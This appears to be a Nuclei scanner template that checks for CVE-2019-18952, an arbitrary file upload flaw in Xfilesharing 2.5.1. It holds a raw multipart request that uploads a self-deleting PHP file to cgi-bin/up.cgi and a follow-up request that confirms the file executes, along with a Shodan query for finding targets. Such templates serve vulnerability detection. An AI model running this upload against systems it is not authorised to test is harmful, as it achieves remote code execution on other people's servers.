id: CVE-2019-18952

info:
  name: Xfilesharing 2.5.1 - Arbitrary File Upload
  author: daffainfo
  severity: critical
  description: |
    SibSoft Xfilesharing through 2.5.1 allows cgi-bin/up.cgi arbitrary file upload.This can be combined with CVE-2019-18951 to achieve remote code execution via a .html file, containing short codes, that is served over HTTP.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact:
    Attackers can upload malicious files and execute arbitrary code remotely, leading to full system compromise.
  reference:
    - https://www.exploit-db.com/exploits/47659
    - https://gist.github.com/pak0s/af9f640170aed335fdf6d110d468dbce
    - https://nvd.nist.gov/vuln/detail/CVE-2019-18952
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-18952
    cwe-id: CWE-434
    epss-score: 0.45361
    epss-percentile: 0.98634
    cpe: cpe:2.3:a:sibsoft:xfilesharing:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: sibsoft
    product: xfilesharing
    shodan-query: html:"/?op=registration" "OpenSSL"
  tags: cve,cve2019,sibsoft,xfilesharing,rce,file-upload,intrusive,vkev,vuln

flow: http(1) && http(2)

variables:
  num: "999999999"
  path: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /cgi-bin/up.cgi HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337

        -----------------------------5825462663702204104870787337
        Content-Disposition: form-data; name="sid"

        {{path}}
        -----------------------------5825462663702204104870787337
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: application/php

        <?php
        echo md5('{{num}}');
        unlink(__FILE__);
        ?>
        -----------------------------5825462663702204104870787337--

    matchers:
      - type: word
        words:
          - "<OK>"
        internal: true

  - raw:
      - |
        GET /cgi-bin/temp/{{path}}/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "{{md5(num)}}"
# digest: 4a0a00473045022100f886c3fd750d209e97b5f4562040f1924bffbfd69412ef9ea9b979997c5cba06022023080855375085be15f1f28b5dd2bfbc7532e53cdab8e9fb82c75aa519ef2b1b:922c64590222798bb761d5b6d8e72950